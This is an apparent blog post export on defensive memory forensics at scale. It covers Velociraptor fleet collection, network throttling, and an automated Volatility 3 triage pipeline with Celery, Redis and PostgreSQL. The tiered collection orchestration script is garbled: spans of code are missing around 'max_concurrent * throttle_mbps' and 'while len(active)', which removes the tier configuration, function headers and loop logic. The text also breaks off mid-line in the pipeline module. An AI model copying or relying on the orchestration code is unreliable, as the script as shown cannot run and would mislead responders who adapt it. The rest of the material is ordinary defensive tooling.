{"id":362,"date":"2026-05-15T09:00:00","date_gmt":"2026-05-15T00:00:00","guid":{"rendered":"http:\/\/justruss.tech\/index.php\/2026\/05\/15\/memory-analysis-at-scale-from-fleet-collection-to-automated-triage-pipelines\/"},"modified":"2026-05-24T09:36:14","modified_gmt":"2026-05-24T09:36:14","slug":"memory-analysis-at-scale-from-fleet-collection-to-automated-triage-pipelines","status":"publish","type":"post","link":"https:\/\/justruss.tech\/index.php\/2026\/05\/15\/memory-analysis-at-scale-from-fleet-collection-to-automated-triage-pipelines\/","title":{"rendered":"Memory Analysis at Scale: From Fleet Collection to Automated Triage Pipelines"},"content":{"rendered":"<p>Memory analysis is one of the most forensically rich activities available to a threat hunter. A memory image captures the complete runtime state of a system: every running process, every network connection, every loaded module, every decrypted credential, every injected payload that never touched disk. The challenge is not the analysis itself but the operational reality of doing it at scale. Analysing memory from a single compromised host is straightforward. Simultaneously collecting, transferring, processing, and analysing memory images from dozens of endpoints during an active incident, without overwhelming the production network, without disrupting operations, and without losing evidence, is an entirely different problem.<\/p>\n<p>This post covers the complete workflow from first principles: how to collect memory from Windows endpoints at scale using Velociraptor, how to build an automated Linux-based processing pipeline that handles triage, Volatility analysis, IOC extraction, and reporting without manual intervention, how to tune the collection and transfer process to protect the customer network, and how to structure the whole thing so it runs as close to automatically as possible. There are a lot of scripts here. 
They are all intended to be copied, adapted to your environment, and used.<\/p>\n<h3>Understanding the scale problem before you start<\/h3>\n<p>Before designing a collection pipeline, understand what you are actually dealing with in terms of data volume and network load. A Windows 10 endpoint with 16GB RAM produces roughly a 10-12GB memory image after compression. A Windows Server 2019 host with 64GB RAM produces a 45-55GB compressed image. If you need to collect from 50 endpoints simultaneously during an incident, the total data volume is between roughly 500GB and 2.5TB depending on the RAM configuration of those machines. Transferring that over a corporate LAN that is simultaneously handling production traffic is a serious operational consideration, not an afterthought.<\/p>\n<p>The network impact calculation for a typical enterprise incident response scenario:<\/p>\n<pre>## Network impact estimation script\n## Run this before any collection to understand the blast radius\n\n# Quoting EOF stops the shell expanding $ or backticks inside the Python below\npython3 &lt;&lt; 'EOF'\nimport json\n\n# Define your endpoint inventory (adapt to your environment)\nendpoints = {\n    &quot;workstations_16gb&quot;: {&quot;count&quot;: 30, &quot;ram_gb&quot;: 16, &quot;compression_ratio&quot;: 0.65},\n    &quot;workstations_32gb&quot;: {&quot;count&quot;: 15, &quot;ram_gb&quot;: 32, &quot;compression_ratio&quot;: 0.65},\n    &quot;servers_64gb&quot;:      {&quot;count&quot;:  5, &quot;ram_gb&quot;: 64, &quot;compression_ratio&quot;: 0.60},\n}\n\n# Network parameters\nlink_speed_mbps    = 1000   # 1Gbps LAN\nmax_utilisation    = 0.30   # Never use more than 30% of link capacity\nbandwidth_mbps     = link_speed_mbps * max_utilisation\nbandwidth_MBps     = bandwidth_mbps \/ 8\n\nprint(&quot;=== Memory Collection Network Impact Analysis ===\\n&quot;)\ntotal_gb = 0\nfor tier, spec in endpoints.items():\n    compressed_gb = spec[&quot;ram_gb&quot;] * spec[&quot;compression_ratio&quot;]\n    tier_total    = compressed_gb * spec[&quot;count&quot;]\n    total_gb     += tier_total\n    
transfer_time = (compressed_gb * 1024) \/ (bandwidth_MBps * 60)\n    print(f&quot;{tier}:&quot;)\n    print(f&quot;  Count:           {spec[&#039;count&#039;]} endpoints&quot;)\n    print(f&quot;  RAM per host:    {spec[&#039;ram_gb&#039;]} GB&quot;)\n    print(f&quot;  Compressed size: ~{compressed_gb:.1f} GB per image&quot;)\n    print(f&quot;  Tier total:      ~{tier_total:.1f} GB&quot;)\n    print(f&quot;  Transfer time:   ~{transfer_time:.1f} minutes per host at 30% link&quot;)\n    print()\n\nprint(f&quot;Total data volume:   {total_gb:.1f} GB&quot;)\nprint(f&quot;Available bandwidth: {bandwidth_MBps:.1f} MB\/s ({bandwidth_mbps:.0f} Mbps)&quot;)\nprint(f&quot;Sequential transfer: {total_gb * 1024 \/ bandwidth_MBps \/ 3600:.1f} hours&quot;)\nprint()\n\n# Calculate concurrent collection limits\nmax_concurrent = int(bandwidth_MBps \/ (16 * 1024 \/ (20 * 60)))  # 20 min target per host\nprint(f&quot;Recommended max concurrent collections: {max(1, max_concurrent)} endpoints&quot;)\nprint(&quot;(Assumes 16GB image, 20 minute transfer window, 30% link utilisation)&quot;)\nEOF<\/pre>\n<p>Running this calculation before you start collection is not optional. An analyst who triggers simultaneous memory collection across 50 endpoints on a 1Gbps flat network with no throttling will consume the full link capacity, impact production traffic, potentially trigger network monitoring alerts, and risk partial or failed transfers that compromise the forensic integrity of the images. The tiered approach described later in this post is the answer to this problem.<\/p>\n<h3>The analysis server: hardware and software requirements<\/h3>\n<p>The analysis server is the hub of the entire pipeline. Memory images arrive here, are processed automatically, and results are made available to analysts. 
Sizing this server correctly before the pipeline runs saves significant pain during an incident when time pressure is high.<\/p>\n<p>Minimum specification for processing 50 concurrent images: 32 CPU cores (Volatility analysis is CPU-bound and benefits significantly from parallelism), 128GB RAM (Volatility 3 loads significant data structures into memory during analysis), 10TB of storage (NVMe or SSD-backed RAID for the image landing zone, HDD for long-term retention), and a 10Gbps network interface for receiving images from the Velociraptor server. A dedicated analysis server rather than a shared platform is strongly preferred during active incidents.<\/p>\n<pre>#!\/bin\/bash\n## Analysis server setup script\n## Ubuntu 22.04 LTS - run as root\n\nset -euo pipefail\n\necho \"[*] Setting up memory analysis pipeline server\"\n\n# System updates\napt update &amp;&amp; apt upgrade -y\n\n# Core dependencies\n# PostgreSQL and Redis run as containers (docker-compose.yml); installing the host\n# packages as well would occupy ports 5432 and 6379 and stop the containers binding\napt install -y \\\n    python3 python3-pip python3-venv \\\n    git curl wget jq \\\n    parallel \\\n    yara \\\n    foremost \\\n    bulk-extractor \\\n    sleuthkit \\\n    docker.io docker-compose \\\n    nginx \\\n    unzip p7zip-full \\\n    libssl-dev libffi-dev\n\n# Python virtual environment for Volatility\npython3 -m venv \/opt\/vol3-env\nsource \/opt\/vol3-env\/bin\/activate\n\npip install --upgrade pip\npip install \\\n    volatility3 \\\n    yara-python \\\n    pefile \\\n    capstone \\\n    python-magic \\\n    requests \\\n    psycopg2-binary \\\n    redis \\\n    celery \\\n    flower \\\n    jinja2 \\\n    elasticsearch\n\n# Volatility 3 symbol tables (required for Windows analysis)\nmkdir -p \/opt\/vol3-symbols\ncd \/opt\/vol3-symbols\nwget https:\/\/downloads.volatilityfoundation.org\/volatility3\/symbols\/windows.zip\n# volatility3\/symbols already exists inside the package, so symlinking onto it\n# would only create a nested link; copy the pack in instead (Volatility 3 can\n# read symbol packs from the zip without extracting them)\ncp windows.zip \/opt\/vol3-env\/lib\/python3.*\/site-packages\/volatility3\/symbols\/\n\necho \"[*] Volatility 3 installed: $(vol 
--version)\"\n\n# Directory structure\nmkdir -p \/srv\/memory\/{landing,processing,complete,reports,yara_rules,logs}\nchmod 755 \/srv\/memory\n\necho \"[+] Analysis server setup complete\"<\/pre>\n<h3>Velociraptor: configuring for fleet memory collection<\/h3>\n<p>Velociraptor is the collection layer. It handles agent communication, artefact execution, file transfer, and result aggregation. The key configuration choices for memory collection at scale are throttling (how fast each agent transfers its image), concurrency control (how many agents collect simultaneously), and the collection artefact itself.<\/p>\n<p>The default Velociraptor transfer settings are not optimised for large file collection. The default upload speed is uncapped, which means if you trigger a hunt across 50 endpoints simultaneously each one will attempt to transfer at full link speed. The configuration changes below set sensible defaults for an enterprise incident response context.<\/p>\n<pre>## Velociraptor server configuration adjustments\n## Add to server.config.yaml before starting a collection hunt\n\nFrontend:\n  # Maximum upload bandwidth per client in bytes\/second\n  # 10MB\/s = 80Mbps per client - adjust based on your link capacity\n  max_upload_size: 10485760\n\nClient:\n  # Concurrent connections to the server per client\n  concurrency: 1\n\n  # Maximum memory for buffering uploads\n  max_memory_size: 524288000  # 500MB buffer per client\n\n# Datastore settings for large file handling\nDatastore:\n  # Use file-based datastore for large collections\n  implementation: FileBaseDataStore\n\n  # Separate high-speed storage for collection landing zone\n  location: \/srv\/velociraptor\/datastore<\/pre>\n<pre>## Custom Velociraptor artefact for controlled memory acquisition\n## Save as Custom.Memory.AcquireControlled.yaml\n## Deploy via: Velociraptor GUI &gt; Server Artifacts &gt; Add Artifact\n\nname: Custom.Memory.AcquireControlled\ndescription: |\n    Acquires a full physical memory 
image with bandwidth throttling.\n    Compresses the image before transfer to reduce network impact.\n    Records acquisition metadata for chain of custody documentation.\n\nauthor: justruss\ntype: CLIENT\nparameters:\n  - name: UploadImage\n    description: Upload the completed image to the server\n    default: \"Y\"\n    type: bool\n  - name: CompressionLevel\n    description: Zlib compression level 1-9 (1=fast, 9=smallest)\n    default: \"3\"\n    type: int\n  - name: ThrottleMBps\n    description: Maximum transfer speed in MB\/s (0 = unlimited)\n    default: \"10\"\n    type: int\n\nsources:\n  - name: AcquisitionMetadata\n    query: |\n        -- Record pre-acquisition system state for documentation\n        LET hostname    = info().Fqdn\n        LET acq_time    = now()\n        LET os_version  = info().OS\n        LET total_ram   = info().PhysicalMemory\n\n        SELECT\n            hostname AS Hostname,\n            acq_time AS AcquisitionTime,\n            os_version AS OSVersion,\n            format(format=\"%.2f GB\", args=[total_ram \/ 1073741824.0]) AS TotalRAM,\n            \"WinPmem via Velociraptor\" AS AcquisitionTool,\n            \"SHA256 recorded post-acquisition\" AS IntegrityNote\n        FROM scope()\n\n  - name: MemoryImage\n    query: |\n        LET hostname = info().Fqdn\n        LET timestamp = format(format=\"%d\", args=[now()])\n        LET output_path = format(format=\"C:\/Windows\/Temp\/mem_%v_%v.raw\",\n                                  args=[hostname, timestamp])\n\n        -- Acquire memory using built-in WinPmem\n        LET acquisition = SELECT * FROM Artifact.Windows.Memory.Acquisition(\n            destination=output_path,\n            -- Limit acquisition tool CPU usage\n            limit_cpu=50\n        )\n\n        -- Upload the image. upload() takes the source path as file= and does\n        -- not rate-limit on its own, so ThrottleMBps has to be enforced\n        -- elsewhere, for example with network QoS.\n        LET uploaded = SELECT\n            upload(\n                file=output_path,\n                name=format(format=\"%v_%v.raw\", args=[hostname, timestamp]),\n                accessor=\"file\"\n            ) AS UploadResult,\n            output_path AS LocalPath,\n            hostname AS Host,\n            timestamp AS Timestamp\n        FROM acquisition\n        WHERE UploadImage\n\n        -- Remove the local staging file only after a successful upload.\n        -- This has to happen in the same source: LET variables such as\n        -- output_path are not visible to other sources in the artifact.\n        SELECT *, rm(filename=LocalPath) AS Removed\n        FROM uploaded\n        WHERE UploadResult.StoredName<\/pre>\n<h3>Tiered collection strategy: protecting the customer network<\/h3>\n<p>The single most important design decision in a fleet memory collection programme is how you sequence and throttle the collection. Doing it wrong causes production impact. Doing it right keeps collection traffic within a bandwidth budget that leaves production traffic unaffected.<\/p>\n<p>The tiered approach divides endpoints into priority groups and collects from each group sequentially with configurable concurrency limits. Tier 1 contains your highest-priority targets: domain controllers, servers where privileged credentials are likely to be cached in LSASS, and systems showing active IOCs in other telemetry. These are collected first because they are most likely to hold relevant evidence and most likely to have volatile state that changes quickly. Tier 2 covers servers running important services. 
Tier 3 covers workstations and less critical endpoints.<\/p>\n<pre>#!\/usr\/bin\/env python3\n## Tiered collection orchestration script\n## Runs on the analysis server, communicates with Velociraptor API\n## Requires: velociraptor binary, API credentials configured\n\n\"\"\"\nMemory collection orchestrator with tiered network-aware scheduling.\nControls concurrent collection count per tier to protect production bandwidth.\n\"\"\"\n\nimport subprocess\nimport time\nimport json\nimport logging\nimport threading\nimport queue\nfrom datetime import datetime\nfrom dataclasses import dataclass, field\nfrom typing import List, Dict, Optional\nfrom pathlib import Path\n\nlogging.basicConfig(\n    level=logging.INFO,\n    format='%(asctime)s [%(levelname)s] %(message)s',\n    handlers=[\n        logging.FileHandler('\/srv\/memory\/logs\/collection_orchestrator.log'),\n        logging.StreamHandler()\n    ]\n)\nlog = logging.getLogger(__name__)\n\n@dataclass\nclass CollectionTarget:\n    hostname:     str\n    client_id:    str\n    tier:         int\n    ram_gb:       float\n    priority_ioc: bool = False\n    collected:    bool = False\n    hunt_id:      Optional[str] = None\n    started_at:   Optional[datetime] = None\n    completed_at: Optional[datetime] = None\n\n@dataclass\nclass TierConfig:\n    tier:           int\n    max_concurrent: int\n    throttle_mbps:  int\n    description:    str\n\n# Tier configuration - adjust max_concurrent based on your link capacity\n# Rule of thumb: max_concurrent * throttle_mbps  List[Dict]:\n    \"\"\"Query Velociraptor for all enrolled clients.\"\"\"\n    result = subprocess.run([\n        \"velociraptor\", \"--config\", config_path,\n        # Adjacent string literals are joined; a plain \"...\" literal cannot span lines\n        \"query\", (\"SELECT client_id, os_info.hostname AS hostname, \"\n                  \"os_info.phys_memory \/ 1073741824.0 AS ram_gb \"\n                  \"FROM clients()\"),\n        \"--format\", \"json\"\n    ], capture_output=True, text=True, timeout=30)\n\n    if result.returncode != 0:\n        
log.error(f\"Failed to query clients: {result.stderr}\")\n        return []\n\n    return json.loads(result.stdout) if result.stdout.strip() else []\n\ndef start_collection_hunt(\n    client_id:     str,\n    throttle_mbps: int,\n    config_path:   str\n) -&gt; Optional[str]:\n    \"\"\"Start a memory collection hunt on a specific client. Returns hunt_id.\"\"\"\n    result = subprocess.run([\n        \"velociraptor\", \"--config\", config_path,\n        \"hunt\", \"--client_id\", client_id,\n        \"--artifact\", \"Custom.Memory.AcquireControlled\",\n        \"--args\", json.dumps({\"ThrottleMBps\": str(throttle_mbps), \"UploadImage\": \"Y\"}),\n        \"--format\", \"json\"\n    ], capture_output=True, text=True, timeout=30)\n\n    if result.returncode != 0:\n        log.error(f\"Failed to start hunt on {client_id}: {result.stderr}\")\n        return None\n\n    data = json.loads(result.stdout)\n    return data.get(\"hunt_id\")\n\ndef check_hunt_complete(hunt_id: str, config_path: str) -&gt; bool:\n    \"\"\"Check whether a hunt has completed on all targets.\"\"\"\n    result = subprocess.run([\n        \"velociraptor\", \"--config\", config_path,\n        \"query\", f\"SELECT * FROM hunt_results(hunt_id='{hunt_id}')\",\n        \"--format\", \"json\"\n    ], capture_output=True, text=True, timeout=30)\n\n    if result.returncode != 0:\n        return False\n\n    data = json.loads(result.stdout) if result.stdout.strip() else []\n    return len(data) &gt; 0\n\ndef collect_tier(\n    targets:     List[CollectionTarget],\n    tier_config: TierConfig,\n    config_path: str\n) -&gt; None:\n    \"\"\"Collect memory from all targets in a tier with concurrency control.\"\"\"\n\n    log.info(f\"Starting Tier {tier_config.tier}: {tier_config.description}\")\n    log.info(f\"  Targets: {len(targets)}\")\n    log.info(f\"  Max concurrent: {tier_config.max_concurrent}\")\n    log.info(f\"  Throttle: {tier_config.throttle_mbps} MB\/s per host\")\n    log.info(f\"  Max 
bandwidth: {tier_config.max_concurrent * tier_config.throttle_mbps * 8} Mbps\")\n\n    active = {}\n    pending = queue.Queue()\n    for t in targets:\n        pending.put(t)\n\n    while not pending.empty() or active:\n        # Start new collections up to the concurrency limit\n        while len(active)  None:\n    \"\"\"Run the full tiered collection campaign.\"\"\"\n\n    start_time = datetime.now()\n    log.info(f\"Collection campaign started: {start_time}\")\n    log.info(f\"Total targets: {len(target_list)}\")\n\n    # Group targets by tier\n    tiers: Dict[int, List[CollectionTarget]] = {1: [], 2: [], 3: []}\n    for target in target_list:\n        tiers[target.tier].append(target)\n\n    # Collect tier by tier\n    for tier_config in TIER_CONFIGS:\n        tier_targets = tiers.get(tier_config.tier, [])\n        if not tier_targets:\n            log.info(f\"Tier {tier_config.tier}: no targets, skipping\")\n            continue\n        collect_tier(tier_targets, tier_config, config_path)\n\n    # total_seconds() includes whole days; timedelta.seconds silently drops them\n    elapsed = (datetime.now() - start_time).total_seconds() \/ 60\n    collected = sum(1 for t in target_list if t.collected)\n    log.info(f\"Campaign complete: {collected}\/{len(target_list)} collected in {elapsed:.1f} min\")\n\n# Example usage\nif __name__ == \"__main__\":\n    # Define your targets (in practice, load from CMDB or Velociraptor client list)\n    targets = [\n        CollectionTarget(\"DC01\",         \"C.abc123\", tier=1, ram_gb=64, priority_ioc=True),\n        CollectionTarget(\"DC02\",         \"C.def456\", tier=1, ram_gb=64),\n        CollectionTarget(\"FILESERVER01\", \"C.ghi789\", tier=2, ram_gb=32),\n        CollectionTarget(\"WEB01\",        \"C.jkl012\", tier=2, ram_gb=32),\n        CollectionTarget(\"WORKSTATION01\",\"C.mno345\", tier=3, ram_gb=16),\n        CollectionTarget(\"WORKSTATION02\",\"C.pqr678\", tier=3, ram_gb=16),\n    ]\n    run_collection_campaign(targets)<\/pre>\n<h3>Network impact mitigations in depth<\/h3>\n<p>The orchestration script 
above handles the collection-side throttling, but protecting the network during memory collection involves more than limiting transfer speed. Several further mitigations substantially reduce the impact of collection on the production environment.<\/p>\n<p><strong>Compression before transfer.<\/strong> WinPmem can compress memory images before writing them to disk, and Velociraptor compresses file uploads. Compression reduces the typical image from a 16GB workstation to roughly 10-12GB in a normal operating state; stacking both passes gains little, because data that has already been compressed barely shrinks a second time. Images from servers running SQL or Exchange may compress less well because much of their data is already partially compressed. The compression step adds 5-10 minutes to the acquisition time but cuts network transfer time by 20-30%.<\/p>\n<p><strong>Time-of-day scheduling for non-urgent collections.<\/strong> Tier 3 workstation collections that do not have active IOCs are candidates for off-hours scheduling. A workstation that needs to be collected for baseline comparison but is not showing active indicators can be queued for collection at 2am, when link utilisation is naturally lowest. The orchestration script has no scheduler of its own, but the tier system makes this straightforward: mark non-urgent targets as tier 3 and run a separate campaign containing only those targets at the chosen time (for example from cron).<\/p>\n<p><strong>Dedicated collection VLAN or QoS marking.<\/strong> In environments with managed switches and QoS policies, memory collection traffic can be marked with a low-priority DSCP value so it is de-prioritised relative to production traffic when the link is under load. 
Velociraptor traffic does not automatically set DSCP values, but a network QoS policy matching the Velociraptor server IP can apply the marking at the switch level.<\/p>\n<pre>#!\/bin\/bash\n## Linux tc (traffic control) configuration on the host running the Velociraptor frontend\n## Limits inbound memory-collection uploads to 500Mbps,\n## leaving headroom for other traffic on a 1Gbps link.\n## Uploads arrive as ingress traffic and tc can only shape egress, so inbound\n## frontend traffic is redirected through an IFB device and shaped there.\n# Run as root\n\nset -euo pipefail\n\nINTERFACE=\"eth0\"\nIFB=\"ifb0\"\nFRONTEND_PORT=8000          # Velociraptor client frontend (default port)\nCOLLECTION_LIMIT=\"500mbit\"\nCOLLECTION_BURST=\"1mb\"      # token bucket size in bytes (1 megabyte)\n\n# Remove any previous configuration\ntc qdisc del dev $INTERFACE ingress 2&gt;\/dev\/null || true\ntc qdisc del dev $IFB root 2&gt;\/dev\/null || true\n\n# Create and enable the IFB device that carries redirected ingress traffic\nmodprobe ifb\nip link add $IFB type ifb 2&gt;\/dev\/null || true\nip link set dev $IFB up\n\n# Redirect inbound packets addressed to the frontend port into the IFB device.\n# (iptables marks are applied after tc ingress, so match the port with u32.)\ntc qdisc add dev $INTERFACE handle ffff: ingress\ntc filter add dev $INTERFACE parent ffff: protocol ip u32 \\\n    match ip dport $FRONTEND_PORT 0xffff \\\n    action mirred egress redirect dev $IFB\n\n# Shape the redirected collection traffic; all other traffic is untouched\ntc qdisc add dev $IFB root tbf \\\n    rate $COLLECTION_LIMIT burst $COLLECTION_BURST latency 50ms\n\necho \"QoS configured: inbound collection traffic limited to $COLLECTION_LIMIT\"\ntc -s qdisc show dev $IFB<\/pre>\n<p><strong>Split collection across multiple ingestion endpoints.<\/strong> For very large environments (200+ endpoints), a single Velociraptor server may become a bottleneck regardless of network capacity. The Velociraptor multi-frontend architecture allows multiple frontend servers to share the collection load, each handling a subset of clients. Images are written to shared storage that the analysis pipeline can reach from any frontend. 
This is a more complex deployment but essentially eliminates the single-server throughput bottleneck.<\/p>\n<pre>## Velociraptor multi-frontend configuration snippet\n## Add to server.config.yaml for load-balanced collection\n\nFrontend:\n  # Primary frontend\n  hostname: velociraptor-primary.corp.local\n  bind_port: 8000\n  max_upload_size: 10485760\n\nExtraFrontends:\n  - hostname: velociraptor-fe2.corp.local\n    bind_port: 8000\n\n  - hostname: velociraptor-fe3.corp.local\n    bind_port: 8000\n\n# Shared datastore accessible by all frontends\nDatastore:\n  implementation: FileBaseDataStore\n  location: \/mnt\/shared\/velociraptor-data  # NFS or other shared filesystem<\/pre>\n<p><strong>Delta collection for repeated hunts.<\/strong> In an extended incident where you need to collect memory from the same endpoints multiple times to track attacker activity over time, transmitting the full image each time is wasteful. A diff-based approach compares the new image against the previous one and transmits only the changed memory regions. This requires more sophisticated processing infrastructure but can reduce repeat-collection transfer volumes by 60-80% for endpoints where attacker activity is limited to specific process regions.<\/p>\n<h3>The automated processing pipeline: architecture overview<\/h3>\n<p>When a memory image lands on the analysis server it enters a processing queue. The pipeline has five stages that run automatically without analyst intervention: validation and integrity checking, basic triage (process tree, network connections, loaded modules), deep analysis (malfind, callbacks, handles), IOC extraction and enrichment, and report generation. 
The five stages share three queues (triage, deep analysis and reporting), each served by its own worker pool, so capacity can be scaled independently according to how CPU- or I\/O-bound the work on each queue is.<\/p>\n<p>The pipeline uses Celery for task queuing (so each stage can be distributed across multiple worker processes), Redis as the message broker (fast and simple for this use case), and PostgreSQL for persistent storage of results (structured results need to be queryable across dozens of images simultaneously). Docker Compose keeps the whole stack portable and easy to deploy on the analysis server.<\/p>\n<pre>## docker-compose.yml for the analysis pipeline\n## Deploy with: docker-compose up -d\n\nversion: \"3.8\"\n\nservices:\n  redis:\n    image: redis:7-alpine\n    ports:\n      - \"6379:6379\"\n    volumes:\n      - redis_data:\/data\n    command: redis-server --appendonly yes\n    restart: unless-stopped\n\n  postgres:\n    image: postgres:15-alpine\n    environment:\n      POSTGRES_DB:       memory_analysis\n      POSTGRES_USER:     analyst\n      # Every POSTGRES_URL below must use this same password\n      POSTGRES_PASSWORD: changeme_in_production\n    ports:\n      - \"5432:5432\"\n    volumes:\n      - postgres_data:\/var\/lib\/postgresql\/data\n      - .\/init_db.sql:\/docker-entrypoint-initdb.d\/init.sql\n    restart: unless-stopped\n\n  worker_triage:\n    build: .\/pipeline\n    command: celery -A pipeline worker -Q triage -c 4 --loglevel=info\n    volumes:\n      - \/srv\/memory:\/srv\/memory\n      - \/opt\/vol3-env:\/opt\/vol3-env\n      - \/opt\/vol3-symbols:\/opt\/vol3-symbols\n    environment:\n      - CELERY_BROKER_URL=redis:\/\/redis:6379\/0\n      - POSTGRES_URL=postgresql:\/\/analyst:changeme_in_production@postgres\/memory_analysis\n    depends_on:\n      - redis\n      - postgres\n    restart: unless-stopped\n\n  worker_deep:\n    build: .\/pipeline\n    command: celery -A pipeline worker -Q deep_analysis -c 2 --loglevel=info\n    volumes:\n      - \/srv\/memory:\/srv\/memory\n      - \/opt\/vol3-env:\/opt\/vol3-env\n      - \/opt\/vol3-symbols:\/opt\/vol3-symbols\n    environment:\n      - CELERY_BROKER_URL=redis:\/\/redis:6379\/0\n      - 
POSTGRES_URL=postgresql:\/\/analyst:changeme_in_production@postgres\/memory_analysis\n    depends_on:\n      - redis\n      - postgres\n    restart: unless-stopped\n\n  worker_report:\n    build: .\/pipeline\n    command: celery -A pipeline worker -Q reporting -c 4 --loglevel=info\n    volumes:\n      - \/srv\/memory:\/srv\/memory\n    environment:\n      - CELERY_BROKER_URL=redis:\/\/redis:6379\/0\n      - POSTGRES_URL=postgresql:\/\/analyst:changeme_in_production@postgres\/memory_analysis\n    depends_on:\n      - redis\n      - postgres\n    restart: unless-stopped\n\n  flower:\n    image: mher\/flower\n    command: celery flower --broker=redis:\/\/redis:6379\/0 --port=5555\n    ports:\n      - \"5555:5555\"\n    depends_on:\n      - redis\n    restart: unless-stopped\n\n  dashboard:\n    build: .\/dashboard\n    ports:\n      - \"8080:8080\"\n    environment:\n      - POSTGRES_URL=postgresql:\/\/analyst:changeme_in_production@postgres\/memory_analysis\n    depends_on:\n      - postgres\n    restart: unless-stopped\n\nvolumes:\n  redis_data:\n  postgres_data:<\/pre>\n<pre>## init_db.sql - PostgreSQL schema for analysis results\n\nCREATE TABLE IF NOT EXISTS memory_images (\n    id              SERIAL PRIMARY KEY,\n    hostname        VARCHAR(255) NOT NULL,\n    image_path      TEXT NOT NULL,\n    image_size_gb   NUMERIC(10,2),\n    acquired_at     TIMESTAMP,\n    received_at     TIMESTAMP DEFAULT NOW(),\n    os_version      VARCHAR(255),\n    status          VARCHAR(50) DEFAULT 'pending',\n    sha256          CHAR(64),\n    tier            INT DEFAULT 3\n);\n\nCREATE TABLE IF NOT EXISTS triage_results (\n    id              SERIAL PRIMARY KEY,\n    image_id        INT REFERENCES memory_images(id),\n    completed_at    TIMESTAMP DEFAULT NOW(),\n    process_count   INT,\n    network_conn_count INT,\n    suspicious_process_count INT,\n    has_malfind     BOOLEAN DEFAULT FALSE,\n    risk_score      INT DEFAULT 0,\n    triage_summary  JSONB\n);\n\nCREATE TABLE IF NOT EXISTS process_list (\n    id              
SERIAL PRIMARY KEY,\n    image_id        INT REFERENCES memory_images(id),\n    pid             INT,\n    ppid            INT,\n    name            VARCHAR(255),\n    path            TEXT,\n    cmd_line        TEXT,\n    create_time     TIMESTAMP,\n    is_suspicious   BOOLEAN DEFAULT FALSE,\n    suspicious_reason TEXT\n);\n\nCREATE TABLE IF NOT EXISTS network_connections (\n    id              SERIAL PRIMARY KEY,\n    image_id        INT REFERENCES memory_images(id),\n    pid             INT,\n    process_name    VARCHAR(255),\n    local_addr      VARCHAR(50),\n    local_port      INT,\n    remote_addr     VARCHAR(50),\n    remote_port     INT,\n    state           VARCHAR(50),\n    is_suspicious   BOOLEAN DEFAULT FALSE\n);\n\nCREATE TABLE IF NOT EXISTS malfind_results (\n    id              SERIAL PRIMARY KEY,\n    image_id        INT REFERENCES memory_images(id),\n    pid             INT,\n    process_name    VARCHAR(255),\n    vad_start       BIGINT,\n    vad_end         BIGINT,\n    protection      VARCHAR(50),\n    has_pe_header   BOOLEAN,\n    entropy         NUMERIC(5,2),\n    yara_matches    TEXT[],\n    risk_level      VARCHAR(20)\n);\n\nCREATE TABLE IF NOT EXISTS iocs_extracted (\n    id              SERIAL PRIMARY KEY,\n    image_id        INT REFERENCES memory_images(id),\n    ioc_type        VARCHAR(50),\n    ioc_value       TEXT,\n    pid             INT,\n    process_name    VARCHAR(255),\n    confidence      VARCHAR(20),\n    source_plugin   VARCHAR(100)\n);\n\nCREATE INDEX idx_images_hostname ON memory_images(hostname);\nCREATE INDEX idx_malfind_risk    ON malfind_results(risk_level);\nCREATE INDEX idx_iocs_type       ON iocs_extracted(ioc_type, ioc_value);\nCREATE INDEX idx_process_suspicious ON process_list(image_id, is_suspicious);<\/pre>\n<h3>The core pipeline: task definitions and worker logic<\/h3>\n<p>The pipeline module defines the Celery tasks and the analysis logic they execute. 
Each task is self-contained: it receives an image ID, loads the image path from the database, runs the relevant Volatility plugins, and writes the results back to the database. Tasks are chained so each stage automatically triggers the next when it completes.<\/p>\n<pre>## pipeline\/pipeline.py - Core Celery task definitions\n\nfrom celery import Celery, chain\nimport subprocess\nimport json\nimport hashlib\nimport logging\nimport os\nimport re\nfrom datetime import datetime\nfrom pathlib import Path\nimport psycopg2\nfrom psycopg2.extras import Json, execute_values\n\nlog = logging.getLogger(__name__)\n\napp = Celery('memory_pipeline',\n             broker=os.environ.get('CELERY_BROKER_URL', 'redis:\/\/localhost:6379\/0'))\n\napp.conf.task_routes = {\n    'pipeline.validate_image':     {'queue': 'triage'},\n    'pipeline.run_triage':         {'queue': 'triage'},\n    'pipeline.run_deep_analysis':  {'queue': 'deep_analysis'},\n    'pipeline.extract_iocs':       {'queue': 'deep_analysis'},\n    'pipeline.generate_report':    {'queue': 'reporting'},\n}\n\nPOSTGRES_URL = os.environ.get('POSTGRES_URL', 'postgresql:\/\/analyst:changeme@localhost\/memory_analysis')\nVOL_CMD      = '\/opt\/vol3-env\/bin\/vol'\nYARA_RULES   = '\/srv\/memory\/yara_rules\/combined.yar'\nIMAGE_DIR    = '\/srv\/memory\/landing'\n\ndef get_db():\n    return psycopg2.connect(POSTGRES_URL)\n\ndef run_vol(image_path: str, plugin: str, extra_args: list = None) -&gt; list:\n    \"\"\"Run a Volatility 3 plugin and return parsed JSON results.\"\"\"\n    cmd = [VOL_CMD, '-f', image_path, '--renderer', 'json', plugin]\n    if extra_args:\n        cmd.extend(extra_args)\n\n    result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)\n    if result.returncode != 0:\n        log.warning(f\"Vol plugin {plugin} returned non-zero: {result.stderr[:200]}\")\n        return []\n\n    try:\n        data = json.loads(result.stdout)\n        return data.get('rows', data) if isinstance(data, dict) 
else data\n    except json.JSONDecodeError:\n        log.error(f\"Failed to parse JSON from {plugin}: {result.stdout[:200]}\")\n        return []\n\n@app.task(bind=True, max_retries=3)\ndef validate_image(self, image_id: int) -&gt; int:\n    \"\"\"Stage 1: Validate image integrity and record metadata.\"\"\"\n    try:\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"SELECT image_path FROM memory_images WHERE id = %s\", (image_id,))\n                row = cur.fetchone()\n                if not row:\n                    raise ValueError(f\"Image ID {image_id} not found\")\n                image_path = row[0]\n\n        if not Path(image_path).exists():\n            raise FileNotFoundError(f\"Image not found: {image_path}\")\n\n        # Calculate SHA256\n        sha256 = hashlib.sha256()\n        with open(image_path, 'rb') as f:\n            for chunk in iter(lambda: f.read(65536), b''):\n                sha256.update(chunk)\n        digest = sha256.hexdigest()\n\n        # Get image size\n        size_gb = Path(image_path).stat().st_size \/ (1024**3)\n\n        # Update database\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"\"\"\n                    UPDATE memory_images\n                    SET sha256 = %s, image_size_gb = %s, status = 'validated'\n                    WHERE id = %s\n                \"\"\", (digest, size_gb, image_id))\n            conn.commit()\n\n        log.info(f\"Image {image_id} validated: {size_gb:.1f}GB 